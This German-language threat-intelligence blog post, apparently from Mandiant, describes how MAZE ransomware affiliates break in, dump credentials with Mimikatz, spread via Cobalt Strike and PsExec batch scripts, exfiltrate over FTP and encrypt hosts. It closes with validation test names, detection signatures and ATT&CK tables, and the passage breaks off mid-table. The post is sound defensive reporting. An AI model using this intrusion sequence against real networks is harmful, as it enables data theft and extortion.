Erpressung 2.0: Taktiken, Techniken und Prozesse bei Angriffen mit der Ransomware MAZE

Jeremy Kennelly

May 07, 2020

23 min read

| Last updated: Aug 19, 2022

Gezielte Ransomware-Angriffe verursachen in allen Weltregionen und Branchen Betriebsstörungen und finanzielle Schäden. Dies hat das Team von FireEye Mandiant Threat Intelligence sowohl bei der Untersuchung der aktuellen Trends bei Sicherheitsvorfällen mit Ransomware als auch bei der Analyse der Aktivitäten der Hackergruppe FIN6, der Folgen eines Ransomware-Angriffs auf Industrieanlagen und des Übergangs zu mehrstufigen Angriffen mit Ransomware dokumentiert. So beobachten wir seit November 2019, dass Hackergruppen mit einem ausgedehnten „Partnernetzwerk“ die Ransomware MAZE für gezielte Angriffe zur Erpressung von Lösegeldern für sensible Daten einsetzen.

Zwar erfolgten die ersten von uns dokumentierten Angriffe mit MAZE bereits im Mai 2019, doch kamen hier vor allem Spam-E-Mails und Exploit-Kits als Verbreitungsmechanismen zum Einsatz. Die Einschleusung von MAZE im Rahmen von mehrstufigen Operationen – als Folgeschritt nach der ersten erfolgreichen Infiltration des Zielsystems – begann also erst ein halbes Jahr später. In diesem Zusammenhang haben wir bei der Beobachtung mutmaßlicher Nutzer der Ransomware in Untergrundforen und der Analyse der einschlägigen Taktiken, Techniken und Prozesse im Rahmen unserer Incident-Response-Einsätze festgestellt, dass verschiedene Akteure an den Kampagnen mit MAZE beteiligt sind. Zudem hat sich gezeigt, dass Nutzer von MAZE eine öffentlich zugängliche Website betreiben, auf der sie gestohlene Daten posten, wenn die Opfer die Zahlung eines Lösegelds verweigern.

Das bedeutet: Erfolgreiche MAZE-Kampagnen können sowohl in der Offenlegung sensibler Daten als auch in der Unterbrechung des Netzwerkbetriebs resultieren und werden überdies durch kriminelle Serviceanbieter unterstützt. Damit stellen sie eine enorme Gefahr für viele Unternehmen dar. Um das von MAZE ausgehende Risiko im Detail zu beleuchten, präsentieren wir in diesem Blogbeitrag Erkenntnisse, die wie bei unseren zahlreichen Incident-Response-Einsätzen sowie bei der Untersuchung der Nutzer und der Funktionsweise von MAZE gewonnen haben.

Weitere Informationen zu dieser Ransomware bietet Ihnen die Aufzeichnung unseres Webinars vom 21. Mai.

Betroffene Unternehmen und Institutionen

Anhand von einschlägigen Medienberichten aus verschiedenen Quellen und im Zuge unserer Beobachtung der MAZE-Website seit November 2019 haben wir über 100 mutmaßliche Opfer von Angriffen mit dieser Ransomware identifiziert. Unsere Liste umfasst vor allem Unternehmen und Institutionen in Nordamerika, erstreckt sich jedoch auch auf fast alle anderen Regionen. Zusätzlich haben wir festgestellt, dass sich die breit gefächerten MAZE-Operationen gegen diverse wichtige Branchen richteten. Wie aus Abbildung 1 hervorgeht, waren insbesondere Fertigungs-, Bau- und Technologieunternehmen, Einzelhändler, öffentliche Institutionen sowie die Anbieter von Rechts-, Finanz- und Gesundheitsdienstleistungen betroffen.

Abbildung 1: Aufschlüsselung der betroffenen Unternehmen und Institutionen nach Regionen und Branchen

Kooperationen und Partnerschaften bei Ransomware-Kampagnen mit MAZE

Mandiant hat verschiedene russischsprachige Akteure identifiziert, die sich als Nutzer der MAZE-Ransomware ausgaben und nach spezialisierten Partnern zur gezielten Verstärkung ihrer Teams suchten. (Nähere Informationen zu diesen Akteuren sind für Abonnenten von Mandiant Intelligence verfügbar.) Außerdem haben wir festgestellt, dass ein zur Verwaltung der Zielunternehmen von MAZE-Angriffen genutztes Dialogfeld einen Bereich für Transaktionen mit Auftragnehmern umfasst. Dies deckt sich mit unserer Beobachtung, dass der Einsatz von MAZE in partnerschaftlichen Strukturen erfolgt und nicht auf eine spezifische Hackergruppe zurückzuführen ist. Es hat sich ein Geschäftsmodell etabliert, bei dem die Entwickler der Ransomware mit anderen Akteuren kooperieren, die dann gewissermaßen als Dienstleister die Verbreitung der Malware übernehmen und bei jeder Lösegeldzahlung eine Provision erhalten. Parallel bestehen Partnerschaften mit Hackergruppen und Penetrationstestern, die – ebenfalls auf Provisionsbasis – Zielunternehmen ausspähen und infiltrieren und dann die Federführung bei der Ausweitung der Zugriffsrechte und der Ausbreitung im Netzwerk übernehmen. In einigen Fällen erhielten die Auftragnehmer sogar ein festes Gehalt (statt einer Provision) für die Identifizierung potenzieller Zielunternehmen und die Bestimmung ihrer jährlichen Umsätze. Auf diese Weise hat sich ein hocheffizientes kriminelles Netzwerk entwickelt, von dem alle involvierten Spezialisten profitieren.

Abbildung 2: Dialogfeld der MAZE-Ransomware

Die anfängliche Verbreitung von MAZE mithilfe von Exploit-Kits und Spam-Kampagnen

In der bis Ende 2019 dauernden Anfangsphase erfolgte die Verbreitung von MAZE direkt über Exploit-Kits und Spam-Kampagnen. So beobachtete das Team von Mandiant im November 2019, dass zahlreiche Mitarbeiter von deutschen und US-amerikanischen Unternehmen sowie einige Angestellte von in Kanada, Italien und Südkorea ansässigen Firmen schädliche E-Mails erhielten, deren Zweck in der Einschleusung der MAZE-Ransomware bestand. Die betreffenden E-Mails enthielten vorgeblich wichtige Steuer-, Rechnungs- oder Lieferinformationen und beinhalteten angehängte Dokumente oder Inline-Links zu Dokumenten, die den Download- und Ausführungsvorgang starteten, sobald sie geöffnet wurden.

Die erste derartige Kampagne erstreckte sich über den 6. und 7. November und nahm vor allem deutsche Adressaten ins Visier. Wie in Abbildung 3 dargestellt, nutzten die Angreifer in diesem Fall die Betreffzeilen „Wichtige informationen uber Steuerruckerstattung“ und „1&1 Internet AG - Ihre Rechnung 19340003422 vom 07.11.19“, um ihre mit Makros gespickten E-Mail-Anhänge glaubwürdig erscheinen zu lassen. Bei den Empfängern handelte es sich meist um Mitarbeiter von Finanzdienstleistern, Gesundheitsanbietern und Fertigungsunternehmen. Interessanterweise erfolgte der Versand der E-Mails über verschiedene schädliche Domains, die alle vom Inhaber der E-Mail-Adresse [email protected] registriert worden waren.

Abbildung 3: Gefälschte E-Mail in deutscher Sprache

Kurz darauf begann am 8. November eine zweite MAZE-Kampagne, die vor allem auf Finanzdienstleister und Versicherungsunternehmen in den Vereinigten Staaten abzielte. Hier wurden die E-Mails von infiltrieren oder gefälschten Konten versandt und enthielten einen Inline-Link, über den ausführbarer MAZE-Schadcode heruntergeladen wurde.

Dagegen kamen bei einer dritten MAZE-Kampagne am 18. und 19. November einmal mehr Dokumente mit Makros zum Einsatz, die Empfängern in US-amerikanischen und kanadischen Unternehmen aus verschiedenen Branchen als vermeintliche Telefonrechnungen oder Lieferinformationen zugestellt wurden (siehe Abbildungen 4 und 5). Die betreffenden E-Mails trugen die Betreffzeilen „Missed package delivery“ und "Your AT&T wireless bill is ready to view" und stammten von verschiedenen schädlichen Domains mit der Registrantenadresse [email protected] (Bemerkenswerterweise wurde diese Adresse Ende November 2019 auch zur Registrierung verschiedener italienischer Domains verwendet.)

Abbildung 4: Gefälschte AT&T-E-Mail

Abbildung 5: Gefälschte E-Mail der kanadischen Post

Der Übergang zu mehrstufigen Angriffen mit potenziell schwerwiegenderen Folgen

Unseren Beobachtungen zufolge gehen die Angreifer seit einiger Zeit zunehmend zu einer neuen Taktik über, bei der die Ransomware erst nach der erfolgreichen Infiltration eingeschleust wird. Diese Vorgehensweise bietet ihnen die Möglichkeit, mehr Hosts in der Infrastruktur des Zielunternehmens zu infizieren und überdies sensible Daten zu stehlen, die dann als zusätzliches Druckmittel für die Erpressung von Lösegeldern genutzt werden können. Im letzteren Fall verlangen die Kriminellen sowohl eine Zahlung für den Entschlüsselungsschlüssel als auch eine Extragebühr für die Zurückhaltung der erbeuteten Daten.

Auch wenn diese komplexen Angriffe meist mit relativ ähnlichen vorbereitenden Schritten zur Einschleusung der MAZE-Ransomware beginnen, weisen sie bei genauerer Betrachtung doch gewisse Variationen auf, die darauf schließen lassen, dass es sich bei den Urhebern um verschiedene Hackerteams handelt. Darüber hinaus scheint in jedem Team eine gewisse Arbeitsteilung zu herrschen, sodass die einzelnen Mitglieder jeweils für bestimmte Phasen der Operation zuständig sind. Um diesen Sachverhalt näher zu beleuchten, präsentieren wir in den folgenden Abschnitten Detailinformationen über die bei ausgewählten Vorfällen mit MAZE beobachteten TTP (Tools, Taktiken und Prozesse), deren Vielfalt stark auf die Urheberschaft verschiedener, voneinander unabhängiger Akteure hinweist. Letzteres wird auch dadurch untermauert, dass in manchen Fällen nur wenige Wochen, in anderen wiederum viele Monate zwischen dem ersten Eindringen und der Verschlüsselung der Unternehmensdaten liegen.

Erstes Eindringen

Ein Blick auf die Anfangsphase der MAZE-Angriffe zeigt, dass es bei der Infiltration der Zielunternehmen kaum wiederkehrende Muster gibt. Dies deckt sich mit unserer Feststellung, dass verschiedene MAZE-Nutzer die Unterstützung von Partnern in Anspruch nehmen, um sich Zugang zum anvisierten Netzwerk zu verschaffen. Als Beleg haben wir die folgenden Beobachtungen aus verschiedenen Incident-Response-Einsätzen des Mandiant-Teams für Sie zusammengestellt:

In einem Fall öffnete ein Nutzer ein schädliches, als Lebenslauf getarntes Microsoft Word-Dokument, das von den Angreifern erstellte Makros enthielt. Dadurch wurde der Trojaner IcedID gestartet, der den Kriminellen dann seinerseits die Ausführung einer Beacon-Instanz ermöglichte.
Eine andere Angreifergruppe meldete sich über RDP bei einem mit dem Internet verbundenen System an. Für diesen Vorgang wurde ein generisches Support-Konto benutzt. Allerdings ist unklar, wie die Kriminellen in den Besitz des entsprechenden Passworts kamen.
Ein weiteres Team nutzte eine Schwachstelle eines falsch konfigurierten, mit dem Internet verbundenen Systems aus, um Hacker-Tools einzuschleusen, die ihm dann den Zugriff auf das interne Netzwerk ermöglichten.
Bei einem vierten Angriff verschafften sich die Angreifer Zugang zu einem unternehmenseigenen, lediglich mit einem schwachen Passwort geschützten Citrix-Webportal. Unter Ausnutzung dieser legitimen Zugriffsrechte gelang es ihnen, den Metasploit-Client Meterpreter auf einem internen System auszuführen.

Festsetzen im Zielsystem & Langfristige Sicherung des Systemzugriffs

Der Missbrauch legitimer Anmeldedaten und der flächendeckende Einsatz von Beacon in den Zielumgebungen sind zwei Konstanten in der Vorgehensweise der Angreifer, wenn sie sich im Rahmen der Vorbereitung der Einschleusung der MAZE-Ransomware um die Festsetzung im infiltrierten Netzwerk und die langfristige Sicherung des Zugriffs bemühen. Allerdings haben wir auch festgestellt, dass eine Hackergruppe von diesem Schema abwich und ein eigenes Domänenkonto einrichtete, um die nächsten Schritte ihrer Operation vorzubereiten.

Bei mehreren Vorfällen setzen sich die Angreifer in der Zielumgebung fest, indem sie die Backdoor Beacon auf möglichst vielen Servern und Workstations installierten.
Außerdem wurden auf mit dem Internet verbundenen Systemen Webshells installiert, die den Angreifern Zugriff auf der Systemebene boten. Dadurch erhielten sie die Möglichkeit, ihre Zugriffsrechte auszuweiten und eine Backdoor auszuführen.
Regelmäßig war zu beobachten, dass Infiltrationsspezialisten Zugang zu verschiedenen Domänenkonten und lokale Systemkonten mit unterschiedlichen Zugriffsrechten erlangten, die dann im weiteren Verlauf der Operation missbraucht wurden.
Eine Hackergruppe erstellte ein neues Domänenkonto und fügte dieses der Domänenadministratorgruppe hinzu.

Erweiterung der Zugriffsrechte

Das Team von Mandiant hat mehrfach beobachtet, dass die für die Vorbereitung eines MAZE-Angriffs verantwortlichen Hacker das Tool Mimikatz nutzten, um ihre Zugriffsrechte auszuweiten. Diese Bemühungen wurden in verschiedenen Fällen um den Einsatz der Anwendung Bloodhound und die manuelle Suche nach Dateien mit Anmeldedaten ergänzt.

In einem Fall luden die Angreifer weniger als zwei Wochen nach dem ersten Eindringen ein Archiv mit der Bezeichnung mimi.zip herunter und interagierten mit den darin enthaltenen Dateien für den Passwort-Dumper Mimikatz. In den darauffolgenden Tagen wurde dasselbe mimi.zip-Archiv auf zwei Domaincontrollern in der betroffenen Umgebung identifiziert.
Begleitend suchten die Angreifer in der infiltrierten Umgebung nach Dateien, die das Wort „Password“ enthielten. In diesem Zusammenhang wurden verschiedene Archivdateien erstellt, deren Namen auf Aktivitäten zum Diebstahl von Anmeldedaten hindeuteten.
Außerdem suchten die Angreifer nach Hosts, auf denen die Passwort-Verwaltungssoftware KeePass lief.
Gleich bei mehreren Vorfällen kam das Tool Bloodhound zum Einsatz. Dies diente mutmaßlich der Identifizierung möglicher Vektoren zum Diebstahl von Anmeldedaten für Konten mit Domainadministratorrechten.
Die meisten Angreifer nutzten Procdump und Mimikatz, um Anmeldedaten zu stehlen und so die folgenden Phasen des Angriffs vorzubereiten. Dabei machten sie sich vermutlich mithilfe von Bloodhound und PingCastle ein genaues Bild von der Active Directory-Konfiguration des infiltrierten Unternehmens. Abschließend versuchten sie, die gestohlenen Anmeldedaten auszuschleusen und in verschiedenen Cloud-Services zu speichern.

Ausspähung des Zielsystems

Bei der Untersuchung von Vorfällen mit MAZE hat das Mandiant-Team ein breites Spektrum an Methoden zur Ausspähung der Netzwerke, Hosts und Datenbestände im Zielsystem sowie des Verzeichnisdienstes Active Directory identifiziert. Wie die folgende Aufstellung zeigt, nutzten die verschiedenen Angreifer vielfältige Tools und Prozesse zur Interaktion mit der infiltrierten Umgebung.

Bei einigen Hackereinbrüchen begannen die Aktivitäten zur Ausspähung des Zielsystems drei Tage nach dem ersten Eindringen in das Netzwerk des betroffenen Unternehmens. Hier nutzten die Angreifer Spähprogramme wie Cobalt Strike, um Informationen über Netzwerke, Hosts, Dateisysteme und Domains zu sammeln.
Verschiedentlich erfolgte die Ausspähung der Netzwerke, Konten und Hosts in der infiltrierten Umgebung mithilfe von nativen Windows-Befehlen. Ergänzend setzten die Angreifer eingeschleuste Tools wie Advanced IP Scanner und Adfind ein.
Andere Akteure verwendeten in dieser Phase eine Stapelverarbeitungsdatei mit dem Namen „2.bat“. Diese enthielt eine Reihe von nslookup-Befehlen, deren Output in der Datei „2.txt“ ausgegeben wurde.
Eine Hackergruppe übermittelte die bei der Ausspähung der IT-Umgebung erzeugten Daten und Dokumente mithilfe eines verschlüsselten PowerShell-Skripts an einen eigenen FTP-Server.
In einem weiteren Fall setzten die Angreifer über einen Zeitraum von mehreren Tagen Bloodhound, PowerSploit bzw. PowerView (Invoke-ShareFinder) und ein speziell für die Ausspähung entwickeltes Skript ein, das eine Liste aller Verzeichnisse auf sämtlichen internen Hosts erstellte.
Einige Angreifer verwendeten das Tool AdFind und eine Stapelverarbeitungsdatei mit der Bezeichnung „2adfind.bat“, um Informationen über Netzwerke, Hosts, Domains und Nutzer zu sammeln. In diesem Fall wurde der Output des Batch-Skripts mithilfe der ausführbaren Datei 7.exe (einer Instanz des Hilfsprogramms 7zip) in einem Archiv mit der Bezeichnung „ad.7z“ gespeichert.
Eine andere Gruppe nutzte das Tool smbtools.exe , um Konten zu identifizieren, die zur Anmeldung bei verschiedenen Systemen in der Umgebung berechtigt waren.
Bei einem weiteren Angriff riefen die Angreifer Verzeichnislisten von sämtlichen Dateiservern in der infiltrierten Umgebung ab. Hier fanden sich etwa einen Monat später Hinweise auf eine erfolgte Datenausschleusung, was darauf hindeutet, dass die Sammlung der Verzeichnislisten der vorbereitenden Identifizierung sensibler Datenbestände diente.

Ausbreitung im Netzwerk

Bei den meisten Vorfällen mit MAZE-Ransomware nutzten die Angreifer sowohl Cobalt Strike Beacon als auch die zuvor erbeuteten Anmeldedaten, um ihren Aktionsradius in der Umgebung des infiltrierten Unternehmens zu erweitern. Dennoch waren auch in dieser Angriffsphase Abweichungen von der Norm zu beobachten, da in einigen Fällen alternative Tools und Methoden zum Einsatz kamen.

Viele Angreifer setzten schwerpunktmäßig Cobalt Strike Beacon ein, nutzten jedoch außerdem das Tool ngrok, um RDP-Tunnel einzurichten, sowie den Windows-Befehl tscon, um die Kontrolle über legitime RDP-Sitzungen zu übernehmen. Dadurch erhielten sie Zugang zu weiteren Systemen und konnten zugleich ihre Zugriffsrechte erweitern.
In einem Fall infiltrierten die Hacker in den frühen Angriffsphasen Dienste und Nutzerkonten, die sie später zur Ausbreitung im Netzwerk missbrauchten. So erhielten Sie Zugriff auf zahlreiche Systeme. Anschließend setzten sie gestohlene Anmeldedaten ein, um RDP-Verbindungen zu weiteren Netzwerkbereichen einzurichten und Beacon-Backdoors auf knapp einhundert Hosts zu installieren.
In einem anderen Fall nutzten die Angreifer zunächst Metasploit zur Ausbreitung in der Zielumgebung und missbrauchten dann ein lokales Administratorkonto auf einem infiltrierten System, um das Angriffs-Tool Cobalt Strike zu installieren.
In der ersten und zweiten Hälfte des Jahres 2019 versuchte mindestens eine Hackergruppe, den Exploit EternalBlue zur Ausbreitung in der infiltrierten Umgebung zu nutzen. Allerdings gibt es keine Hinweise darauf, dass diese Bemühungen erfolgreich waren.

Realisierung der kriminellen Ziele

Die von uns gesicherten forensischen Spuren deuten darauf hin, dass bei den meisten MAZE-Angriffen Daten gestohlen werden. Obwohl es prinzipiell verschiedene Möglichkeiten gibt, diese Beute zu Geld zu machen (bspw. durch den Verkauf in Untergrundforen oder die Nutzung für betrügerische Zwecke), tendieren die kriminellen MAZE-Nutzer bekanntermaßen dazu, von ihren Opfern ein Lösegeld für die Zurückhaltung der gestohlenen Daten zu fordern.

Eine Hackergruppe nutzte für die Datenausschleusung ein mit Base64 verschlüsseltes PowerShell-Skript, das alle vorhandenen .7z-Dateien auf einen spezifischen, vermittels eines hartcodierten Benutzernamens und Passworts zugänglichen FTP-Server hochlud. Als Vorlage hatte hier anscheinend ein ähnliches Skript gedient, das bereits 2013 im Microsoft-Portal TechNet veröffentlicht worden war.
Bei einem anderen Angriff wurde zur Ausschleusung ein alternativer, aber ebenfalls mit Base64 verschlüsselter PowerShell-Befehl verwendet.
Ferner war zu beobachten, dass bei manchen MAZE-Operationen das Dienstprogramm WinSCP zur Übertragung der erbeuteten Daten auf einen von den Kriminellen kontrollierten FTP-Server genutzt wurde.
In einem Fall setzten die Angreifer sogar ein Datenreplikationsprogramm ein, um die gestohlenen Daten an einen cloudbasierten Filehosting- bzw. Filesharing-Dienst zu übermitteln.
Bei einem weiteren Vorfall verwendeten die Kriminellen vor der Einschleusung der MAZE-Ransomware das Dienstprogramm 7zip, um die in verschiedenen unternehmenseigenen Dateifreigaben gespeicherten Daten zu komprimieren. Die entsprechenden Archive wurden dann unter Ausnutzung des WinSCP-Tools auf einen von den Angreifern kontrollierten FTP-Server ausgeschleust.

Allerdings haben es die kriminellen MAZE-Nutzer nicht nur auf Diebstahl, sondern auch auf die Verschlüsselung von Daten in der Umgebung des betroffenen Unternehmens abgesehen. In diesem Zusammenhang ist zu erwähnen, dass über das bereits erwähnte MAZE-Dialogfeld ein Datum festgelegt werden kann, an dem sich die Lösegeldforderung verdoppelt. Damit bietet die Ransomware die Möglichkeit, den Druck auf die Opfer systematisch zu steigern.

Bei einem Angriff installierten die Hacker fünf Tage nach der Ausschleusung der Daten eine Binärdatei der MAZE-Ransomware auf 15 Hosts in der Umgebung des betroffenen Unternehmens und führten das Schadprogramm auf einigen der infizierten Systeme erfolgreich aus.
Andere Angreifer nutzten Batch-Skripte und eine Reihe von Textdateien mit Hostnamen, um zahlreiche Server und Workstations in der IT-Infrastruktur des betroffenen Unternehmens mit MAZE zu infizieren.
In einem Fall missbrauchten die Kriminellen ein Administratorkonto, um sich bei einer zweistelligen Zahl von Hosts anzumelden und diese nacheinander mit der Ransomware zu infizieren.
Die Aktivitäten zur Verbreitung der MAZE-Ransomware begannen meist direkt nach der Ausschleusung der erbeuteten sensiblen Daten. Mitunter gelang es den Hackern, tausende Hosts zu verschlüsseln. Der dafür ursächliche Prozess lief folgendermaßen ab:
- Durch die Ausführung der Stapelverarbeitungsdatei start.bat wurden verschiedene sekundäre Stapelverarbeitungsdateien mit Namen wie xaa3x.bat oder xab3x.bat erzeugt.
- Jedes dieser sekundären Skripte enthielt eine Reihe von Copy-, WMIC- und PsExec-Befehlen, die sowohl ein Kill-Skript (windows.bat) als auch eine Instanz der MAZE-Ransomware (sss.exe) auf Hosts in der betroffenen Umgebung installierten und ausführten.
- Interessanterweise stellte sich bei der forensischen Untersuchung der betroffenen Umgebung heraus, dass die Zahl der mit MAZE-Skripten infizierten Hosts zehnmal höher war als die Zahl der Hosts, die letztlich verschlüsselt wurden.

Ausblick und Empfehlungen

Da MAZE unserer Ansicht nach von verschiedenen Akteuren verbreitet und eingesetzt wird, steht zu erwarten, dass die bei Sicherheitsvorfällen mit dieser Ransomware beobachteten TTP (Tools, Taktiken und Prozesse) auch weiterhin variieren werden. Dies gilt insbesondere im Hinblick auf die Angriffsvektoren, über die sich die Angreifer beim ersten Eindringen Zugang verschaffen. Umfassendere Empfehlungen für den Umgang mit Ransomware finden Sie in unserem Blogpost Ransomware Protection and Containment Strategies und dem dazugehörigen Whitepaper.

Präventive Maßnahmen mit Mandiant Security Validation

Unternehmen können ihre Sicherheitsinfrastruktur mithilfe von Mandiant Security Validation für über zwanzig MAZE-spezifische Aktivitäten sensibilisieren. Nähere Informationen finden Sie in unserem Headline Release Content Update vom 21. April 2020, das auf dem Mandiant Security Validation Customer Portal verfügbar ist.

A100-877 - Active Directory - BloodHound, CollectionMethod All
A150-006 - Command and Control - BEACON, Check-in
A101-030 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #1
A101-031 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #2
A101-032 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #3
A100-878 - Command and Control - MAZE Ransomware, C2 Check-in
A100-887 - Command and Control - MAZE, DNS Query #1
A100-888 - Command and Control - MAZE, DNS Query #2
A100-889 - Command and Control - MAZE, DNS Query #3
A100-890 - Command and Control - MAZE, DNS Query #4
A100-891 - Command and Control - MAZE, DNS Query #5
A100-509 - Exploit Kit Activity - Fallout Exploit Kit CVE-2018-8174, Github PoC
A100-339 - Exploit Kit Activity - Fallout Exploit Kit CVE-2018-8174, Landing Page
A101-033 - Exploit Kit Activity - Spelevo Exploit Kit, MAZE C2
A100-208 - FTP-based Exfil/Upload of PII Data (Various Compression)
A104-488 - Host CLI - Collection, Exfiltration: Active Directory Reconnaissance with SharpHound, CollectionMethod All
A104-046 - Host CLI - Collection, Exfiltration: Data from Local Drive using PowerShell
A104-090 - Host CLI - Collection, Impact: Creation of a Volume Shadow Copy
A104-489 - Host CLI - Collection: Privilege Escalation Check with PowerUp, Invoke-AllChecks
A104-037 - Host CLI - Credential Access, Discovery: File & Directory Discovery
A104-052 - Host CLI - Credential Access: Mimikatz
A104-167 - Host CLI - Credential Access: Mimikatz (2.1.1)
A104-490 - Host CLI - Defense Evasion, Discovery: Terminate Processes, Malware Analysis Tools
A104-491 - Host CLI - Defense Evasion, Persistence: MAZE, Create Target.lnk
A104-500 - Host CLI - Discovery, Defense Evasion: Debugger Detection
A104-492 - Host CLI - Discovery, Execution: Antivirus Query with WMI, PowerShell
A104-374 - Host CLI - Discovery: Enumerate Active Directory Forests
A104-493 - Host CLI - Discovery: Enumerate Network Shares
A104-481 - Host CLI - Discovery: Language Query Using PowerShell, Current User
A104-482 - Host CLI - Discovery: Language Query Using reg query
A104-494 - Host CLI - Discovery: MAZE, Dropping Ransomware Note Burn Directory
A104-495 - Host CLI - Discovery: MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.html Variant
A104-496 - Host CLI - Discovery: MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.txt Variant
A104-027 - Host CLI - Discovery: Process Discovery
A104-028 - Host CLI - Discovery: Process Discovery with PowerShell
A104-029 - Host CLI - Discovery: Remote System Discovery
A104-153 - Host CLI - Discovery: Security Software Identification with Tasklist
A104-083 - Host CLI - Discovery: System Info
A104-483 - Host CLI - Exfiltration: PowerShell FTP Upload
A104-498 - Host CLI - Impact: MAZE, Desktop Wallpaper Ransomware Message
A104-227 - Host CLI - Initial Access, Lateral Movement: Replication Through Removable Media
A100-879 - Malicious File Transfer - Adfind.exe, Download
A150-046 - Malicious File Transfer - BEACON, Download
A100-880 - Malicious File Transfer - Bloodhound Ingestor Download, C Sharp Executable Variant
A100-881 - Malicious File Transfer - Bloodhound Ingestor Download, C Sharp PowerShell Variant
A100-882 - Malicious File Transfer - Bloodhound Ingestor Download, PowerShell Variant
A101-037 - Malicious File Transfer - MAZE Download, Variant #1
A101-038 - Malicious File Transfer - MAZE Download, Variant #2
A101-039 - Malicious File Transfer - MAZE Download, Variant #3
A101-040 - Malicious File Transfer - MAZE Download, Variant #4
A101-041 - Malicious File Transfer - MAZE Download, Variant #5
A101-042 - Malicious File Transfer - MAZE Download, Variant #6
A101-043 - Malicious File Transfer - MAZE Download, Variant #7
A101-044 - Malicious File Transfer - MAZE Download, Variant #8
A101-045 - Malicious File Transfer - MAZE Download, Variant #9
A101-034 - Malicious File Transfer - MAZE Dropper Download, Variant #1
A101-035 - Malicious File Transfer - MAZE Dropper Download, Variant #2
A100-885 - Malicious File Transfer - MAZE Dropper Download, Variant #4
A101-036 - Malicious File Transfer - MAZE Ransomware, Malicious Macro, PowerShell Script Download
A100-284 - Malicious File Transfer - Mimikatz W/ Padding (1MB), Download
A100-886 - Malicious File Transfer - Rclone.exe, Download
A100-484 - Scanning Activity - Nmap smb-enum-shares, SMB Share Enumeration

Erkennungssignaturen der eingesetzten Angriffsmethoden

Plattform	Signatur-Bezeichnung
MVX (umfasst verschiedene FireEye-Technologien)	Bale Detection FE_Ransomware_Win_MAZE_1
Endpoint Security	WMIC SHADOWCOPY DELETE (METHODOLOGY) MAZE RANSOMWARE (FAMILY)
Network Security	Ransomware.Win.MAZE Ransomware.Maze Ransomware.Maze

Unterscheidung von MAZE-Kampagnen auf Basis der MITRE ATT&CK Matrix

Mandiant verfolgt gegenwärtig drei separate Cluster von Aktivitäten, die der Verbreitung der Ransomware MAZE in infiltrierten Systemen dienen und mutmaßlich von verschiedenen Gruppen ausgehen. Künftige Datenerhebungen und Analysen werden möglicherweise weitere Gruppen identifizieren, die in MAZE-Operationen involviert sind, oder die Zuordnung einiger MAZE-Gruppen zu umfassenderen Clustern erlauben. Des Weiteren ist erwähnenswert, dass die Techniken aus der Phase „Erstes Eindringen“ in die folgende Aufstellung aufgenommen wurden, obwohl der Erstzugriff auf das Zielsystem in einigen Fällen möglicherweise von separaten Auftragnehmern hergestellt wurde.

MAZE-Gruppe 1: Modus Operandi anhand der MITRE ATT&CK Matrix

ATT&CK-Angriffsphase	Zugeordnete Techniken
Erstes Eindringen	T1133: Externe Remote-Services T1078: Gültige Konten
Ausführung	T1059: Befehlszeilenschnittstelle T1086: PowerShell T1064: Scripting T1035: Dienstausführung
Persistenz	T1078: Gültige Konten T1050: Neuer Service
Ausweitung der Zugriffsrechte	T1078: Gültige Konten
Umgehung von Abwehrmaßnahmen	T1078: Gültige Konten T1036: Tarnungstechniken T1027: Verschleierung von Dateien oder Daten T1064: Scripting
Diebstahl von Anmeldedaten	T1110: Brute-Force-Angriff T1003: Ausspähen von Zugangsdaten mit einem Passwort-Dumper
Ausspähung	T1087: Kontoerfassung T1482: Ermittlung der Vertrauensstellung von Domains T1083: Datei- und Verzeichniserfassung T1135: Identifizierung von Netzwerkfreigaben T1069: Ermittlung der Berechtigungsgruppen T1018: Identifizierung von Remotesystemen T1016: Ermittlung der Netzwerkkonfiguration
Ausbreitung im System	T1076: Remote Desktop Protocol (RDP) T1105: Kopieren von Dateien per Fernzugriff
Datenerfassung	T1005: Daten aus dem lokalen System
Command-and-Control-Aktivitäten	T1043: Häufig verwendeter Port T1105: Kopieren von Dateien per Fernzugriff T1071: Standardprotokoll für die Anwendungsebene
Datenausschleusung	T1002: Komprimierte Daten T1048: Ausschleusung über alternatives Protokoll
Störung des Betriebs	T1486: Verschlüsselung der Daten zur Störung des Betriebs T1489: Dienstunterbrechung

MAZE-Gruppe 2: Modus Operandi anhand der MITRE ATT&CK Matrix

ATT&CK-Angriffsphase	Zugeordnete Techniken
Erstes Eindringen	T1193: Spear-Phishing-Anhänge
Ausführung	T1059: Befehlszeilenschnittstelle T1086: PowerShell T1085: Rundll32 T1064: Scripting T1204: Ausnutzung von Benutzeraktionen T1028: Windows-Remoteverwaltung
Persistenz	T1078: Gültige Konten T1050: Neuer Service T1136: Kontoerstellung
Ausweitung der Zugriffsrechte	T1078: Gültige Konten T1050: Neuer Service
Umgehung von Abwehrmaßnahmen	T1078: Gültige Konten T1140: Identifizierung/Entschlüsselung von Dateien oder Daten T1107: Löschung von Dateien T1036: Tarnungstechniken
Diebstahl von Anmeldedaten	T1003: Ausspähen von Zugangsdaten mit einem Passwort-Dumper T1081: Anmeldedaten in Dateien T1171: Manipulation von LLMNR/NBT-Nameservern
Ausspähung	T1087: Kontoerfassung T1482: Ermittlung der Vertrauensstellung von Domains T1083: Datei- und Verzeichniserfassung T1135: Identifizierung von Netzwerkfreigaben T1069: Ermittlung der Berechtigungsgruppen T1018: Identifizierung von Remotesystemen T1033: Ermittlung der Systeminhaber/Benutzer
Ausbreitung im System	T1076: Remote Desktop Protocol (RDP) T1028: Windows-Remoteverwaltung
Datenerfassung	T1074: Zusammentragen der Daten T1005: Daten aus dem lokalen System T1039: Daten aus Netzwerkfreigaben
Command-and-Control-Aktivitäten	T1043: Häufig verwendeter Port T1219: Tools für den Fernzugriff T1105: Kopieren von Dateien per Fernzugriff T1071: Standardprotokoll für die Anwendungsebene T1032: Standard-Verschlüsselungsprotokoll
Datenausschleusung	T1020: Automatisierte Datenausschleusung T1002: Komprimierte Daten T1048: Ausschleusung über alternatives Protokoll
Störung des Betriebs	T1486: Verschlüsselung der Daten zur Störung des Betriebs

MAZE-Gruppe 3 (FIN6): Modus Operandi anhand der MITRE ATT&CK Matrix

ATT&CK-Angriffsphase	Zugeordnete Techniken
Erstes Eindringen	T1133: Externe Remote-Services T1078: Gültige Konten
Ausführung	T1059: Befehlszeilenschnittstelle T1086: PowerShell T1064: Scripting T1035: Dienstausführung
Persistenz	T1078: Gültige Konten T1031: Modifizierung vorhandener Services
